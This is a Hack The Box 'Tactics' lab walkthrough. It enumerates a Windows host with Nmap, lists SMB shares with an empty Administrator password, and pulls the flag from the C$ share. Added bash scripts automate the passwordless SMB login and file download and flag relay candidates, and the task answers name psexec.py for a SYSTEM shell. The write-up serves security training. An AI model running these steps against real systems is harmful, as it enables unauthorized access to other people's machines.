#11 Tactics - Starting Point - Hack The Box || Complete Walkthrough

Tactics is a Windows server with a misconfigured SMB share that offers two attack vectors. One is easy to discover and easy to use. The other involves installing and deploying a popular exploitation framework; while highly effective, it comes with its own disadvantages in terms of discoverability.

In this video we take the quieter of the two paths. Knowing which path to take, and understanding the consequences of each attack vector, will prove vital in your career.

  • See also the previous Starting Point walkthrough, which this one builds on:

Dancing: Starting Point Hack The Box Walkthrough

That walkthrough is a step-by-step guide to the "Dancing" machine on Hack The Box, covering enumeration of its SMB shares, accessing them and retrieving the flag.




Enumeration

In order to get a general view of the target host, we begin with the usual Nmap scan, but with a switch we have not used before.

Alongside -sC (the default script set) we add -Pn. In a real-world environment you should expect firewalls to be present, filtering connections at every step and dropping anything nonstandard, scan probes included. Before it scans any ports, Nmap runs a host-discovery phase: by default an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request. The Windows firewall drops inbound ICMP echo requests by default, so a host like this one never answers, Nmap marks it as down and skips the port scan entirely, even though ports 139 and 445 are reachable.

The -Pn flag skips host discovery, treats the host as online and goes straight to the port probes. This is about getting a result, not stealth: the port probes are still visible to any firewall that logs them, and the only packets you save are the discovery probes. That small saving can still matter, since it is one fewer set of denied requests in the logs before you have even begun attacking the host.

  • -Pn : Treat all hosts as online -- skip host discovery
  • -sC : Equivalent to --script=default

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -Pn 10.129.108.21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 14:00 IST
Nmap scan report for 10.129.108.21
Host is up (0.37s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
| smb2-time:
|   date: 2021-12-25T08:41:20
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: 10m41s
Nmap done: 1 IP address (1 host up) scanned in 72.35 seconds
┌──(mrdev㉿mrdev)-[~]
└─$ 

According to the scan results, the machine is a Windows host exposing MSRPC on port 135, the NetBIOS session service on port 139 and the Server Message Block service on port 445. The smb2-security-mode script also reports that message signing is enabled but not required, which is worth noting: a server that does not enforce signing cannot detect a relayed or tampered session. We have found our target.
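The two facts we just read off the scan by eye, the open ports and the signing mode, are easy to extract automatically. The script below is an added example, not part of the original walkthrough: it embeds the scan output above as a constructed sample so it runs offline, pulls out the open TCP ports, classifies the smb2-security-mode line using the phrases the Nmap script prints, and combines the two into the check a practitioner wants before deciding how loudly to attack the host (port 445 open without enforced signing makes the box a candidate for NTLM relay).

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): parse Nmap's normal output
# offline and pull out the two facts that matter here, the open TCP ports and
# whether the SMB2 security-mode script reports signing as required.

# Constructed sample: the scan output from the walkthrough, embedded so the
# script runs without network access or Nmap installed.
NMAP_OUTPUT=$(cat <<'EOF'
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 14:00 IST
Nmap scan report for 10.129.108.21
Host is up (0.37s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: 10m41s
Nmap done: 1 IP address (1 host up) scanned in 72.35 seconds
EOF
)

# open_ports: read Nmap normal output on stdin, print the open TCP port numbers
# on one line separated by spaces (e.g. "135 139 445").
open_ports() {
  awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
         sub(/\/tcp$/, "", $1)
         printf "%s%s", sep, $1
         sep = " "
       }
       END { print "" }'
}

# smb_signing: classify the smb2-security-mode line. The phrases are the ones
# the Nmap script prints; anything else is reported as "unknown".
smb_signing() {
  local text
  text=$(cat)
  case "$text" in
    *"Message signing enabled and required"*)     echo "required" ;;
    *"Message signing enabled but not required"*) echo "not-required" ;;
    *"Message signing disabled"*)                 echo "disabled" ;;
    *)                                            echo "unknown" ;;
  esac
}

# assess: combine the two. Port 445 open with signing not enforced means the
# host is a candidate for NTLM relay; with signing enforced it is still open
# but relay is off the table; without 445 there is no SMB to talk to.
assess() {
  local text ports signing
  text=$(cat)
  ports=$(printf '%s\n' "$text" | open_ports)
  signing=$(printf '%s\n' "$text" | smb_signing)
  case " $ports " in
    *" 445 "*)
      if [ "$signing" = "required" ]; then
        echo "smb-open:signing-required"
      else
        echo "smb-open:relay-candidate"
      fi ;;
    *) echo "smb-closed" ;;
  esac
}

# Demonstration on the embedded sample.
printf '%s\n' "$NMAP_OUTPUT" | open_ports
printf '%s\n' "$NMAP_OUTPUT" | smb_signing
printf '%s\n' "$NMAP_OUTPUT" | assess
```

Feed a real scan in with `nmap -sC -Pn -oN scan.txt TARGET` and then `assess < scan.txt`; the parser only relies on the `PORT STATE SERVICE` table and the script's wording, so it works on any Nmap normal-output file.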


Enumerate using the SMB Client tool

Inherently, SMB (Server Message Block) is a file-sharing protocol, which means we may extract useful information simply by exploring it. This can be done with the smbclient tool.

In order to find the appropriate switches for this tool, we can use its help menu, which is accessed by typing the smbclient -h command.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -h
Usage: smbclient [-?EgqBVNkPeC] [-?|--help] [--usage] [-R|--name-resolve=NAME-RESOLVE-ORDER]
                [-M|--message=HOST] [-I|--ip-address=IP] [-E|--stderr] [-L|--list=HOST]
                [-m|--max-protocol=LEVEL] [-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR]
                [-c|--command=STRING] [-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]
                [-g|--grepable] [-q|--quiet] [-B|--browse] [-d|--debuglevel=DEBUGLEVEL]
                [-s|--configfile=CONFIGFILE] [-l|--log-basename=LOGFILEBASE] [-V|--version]
                [--option=name=value] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
                [-W|--workgroup=WORKGROUP] [-i|--scope=SCOPE] [-U|--user=USERNAME] [-N|--no-pass]
                [-k|--kerberos] [-A|--authentication-file=FILE] [-S|--signing=on|off|required]
                [-P|--machine-pass] [-e|--encrypt] [-C|--use-ccache] [--pw-nt-hash] service <password>

The help text is short and not very descriptive, but it suits our needs for now. Looking through the options, we settle on listing the available shares (-L) while attempting to log in as Administrator (-U), the built-in highest-privilege local account on Windows.

Normally the SMB server will require a password, but since we want to cover every possible misconfiguration we first try a passwordless login. Pressing Enter at the Administrator password prompt sends an empty password to the server (the -N switch does the same thing without prompting). Whether the server accepts it is what we need to find out.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -L 10.129.108.21 -U Administrator
Enter WORKGROUP\Administrator's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC

SMB1 disabled -- no workgroup available

┌──(mrdev㉿mrdev)-[~]
└─$ 
 

Foothold


Get a foothold on the SMB server using the smbclient tool

From here, run the command below to connect to a share. The backslashes are doubled because the shell would otherwise treat them as escape characters; smbclient also accepts the forward-slash form //10.129.108.21/ADMIN$.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.108.21\\ADMIN$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \>

We have an interactive smb: \> prompt. Run help to list the available commands.

smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            deltree        dir
du             echo           exit           get            getfacl
geteas         hardlink       help           history        iosize
lcd            link           lock           lowercase      ls
l              mask           md             mget           mkdir
more           mput           newer          notify         open
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir
posix_unlink   posix_whoami   print          prompt         put
pwd            q              queue          quit           readlink
rd             recurse        reget          rename         reput
rm             rmdir          showacls       setea          setmode
scopy          stat           symlink        tar            tarmode
timeout        translate      unlock         volume         vuid
wdel           logon          listconnect    showconnect    tcon
tdis           tid            utimes         logoff         ..
!                                                                
smb: \>
The ADMIN$ share maps to C:\Windows. Instead, we connect to the C$ share, which maps to the root of the C: drive and therefore exposes the whole file system.

smb: \> exit
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.108.21\\C$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \>
We have access to the file system. From here we navigate directly to the usual location of the root flag on Hack The Box Windows machines, the Administrator's desktop. Using the dir command, we find the flag file sitting there.

smb: \> dir
$Recycle.Bin                      DHS        0  Wed Apr 21 20:53:49 2021
Config.Msi                        DHS        0  Wed Jul  7 23:34:56 2021
Documents and Settings          DHSrn        0  Wed Apr 21 20:47:12 2021
pagefile.sys                      AHS 738197504 Sat Dec 25 14:08:15 2021
PerfLogs                            D        0  Sat Sep 15 12:49:00 2018
Program Files                      DR        0  Wed Jul  7 23:34:24 2021
Program Files (x86)                 D        0  Wed Jul  7 23:33:38 2021
ProgramData                        DH        0  Wed Apr 21 21:01:48 2021
Recovery                         DHSn        0  Wed Apr 21 20:47:15 2021
System Volume Information         DHS        0  Wed Apr 21 21:04:04 2021
Users                              DR        0  Wed Apr 21 20:53:18 2021
Windows                             D        0  Wed Jul  7 23:35:23 2021
3774463 blocks of size 4096. 1157823 blocks available
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> dir
.                                  DR        0  Thu Apr 22 12:46:03 2021
..                                 DR        0  Thu Apr 22 12:46:03 2021
desktop.ini                       AHS      282  Wed Apr 21 20:53:32 2021
flag.txt                            A       32  Fri Apr 23 15:09:00 2021
3774463 blocks of size 4096. 1157455 blocks available
smb: \Users\Administrator\Desktop\>

To retrieve flag.txt from the server we use the get flag.txt command. The file is written to the directory our shell was in when smbclient was launched (lcd changes that directory from inside the smbclient prompt).

smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit

We can now exit the smbclient command line and read the file we just downloaded using the cat command.

┌──(mrdev㉿mrdev)-[~]
└─$ cat flag.txt
*****************************

You have successfully retrieved the flag, congratulations!
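Both manual steps above, listing the shares with an empty Administrator password and then pulling flag.txt out of C$, can be scripted. The block below is an added example, not code from the original walkthrough: it embeds the share table from the smbclient -L run as a constructed sample so the parser can be exercised offline, picks out administrative shares by their trailing $, and wraps the two smbclient invocations so that the whole check runs without an interactive prompt (-N sends an empty password, -c runs a command string and exits). The host, user and path in the usage comment are the ones from this walkthrough.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough). It turns the two manual
# steps, listing shares with an empty Administrator password and pulling
# flag.txt out of C$, into a non-interactive script, and parses the share table
# so administrative shares (names ending in $) can be picked out automatically.

# Constructed sample: the share table from the smbclient -L run, embedded so
# the parser can be exercised without a target.
SHARE_LISTING=$(cat <<'EOF'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

SMB1 disabled -- no workgroup available
EOF
)

# parse_shares: read smbclient -L output on stdin and print "name type" for
# each share in the table. The table starts at the Sharename header, the
# dashed underline is skipped, and the first blank line ends it.
parse_shares() {
  awk '
    /^[[:space:]]*Sharename[[:space:]]+Type/    { in_table = 1; next }
    in_table && /^[[:space:]]*-+[[:space:]]+-+/ { next }
    in_table && NF == 0                         { in_table = 0 }
    in_table && NF >= 2                         { print $1, $2 }
  '
}

# admin_shares: keep only administrative shares, whose names end in "$".
admin_shares() {
  parse_shares | awk '$1 ~ /\$$/ { print $1 }'
}

# list_shares_nopass HOST USER: the -L step without a prompt. -N sends an empty
# password instead of asking for one, which is the same misconfiguration test
# the walkthrough performs by pressing Enter at the prompt.
list_shares_nopass() {
  smbclient -L "$1" -U "$2" -N 2>/dev/null | parse_shares
}

# fetch_nopass HOST SHARE USER REMOTE_DIR FILE: connect to a share with an
# empty password and run "cd ...; get ..." through -c, so no interactive
# smb: \> session is needed. The file lands in the current directory.
fetch_nopass() {
  smbclient "//$1/$2" -U "$3" -N -c "cd $4; get $5"
}

# Offline demonstration on the embedded listing.
printf '%s\n' "$SHARE_LISTING" | parse_shares
printf '%s\n' "$SHARE_LISTING" | admin_shares

# Against the target (needs smbclient and network access; not run here):
#   list_shares_nopass 10.129.108.21 Administrator
#   fetch_nopass 10.129.108.21 'C$' Administrator 'Users\Administrator\Desktop' flag.txt
```

Quote the share name and remote path in single quotes as shown, otherwise the shell will try to expand `$` and eat the backslashes before smbclient sees them.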


Task Answers

TASK 1: Which Nmap switch can we use to enumerate machines when our packets are otherwise blocked by the Windows firewall?

Ans. -Pn

TASK 2: What does the 3-letter acronym SMB stand for?

Ans. Server Message Block

TASK 3: What port does SMB use to operate at?

Ans. 445

TASK 4: What command-line argument do you give to `smbclient` to list available shares?

Ans. -L

TASK 5: What character at the end of a share name indicates it's an administrative share?

Ans. $

TASK 6: Which Administrative share is accessible on the box that allows users to view the whole file system?

Ans. C$


TASK 7: What command can we use to download the files we find on the SMB Share?

Ans. get


TASK 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

Ans. psexec.py (this is the second, noisier vector the introduction mentions: psexec.py uploads a service executable to the ADMIN$ share and starts it as a service to obtain a SYSTEM shell, leaving a much larger footprint than simply reading files over C$)
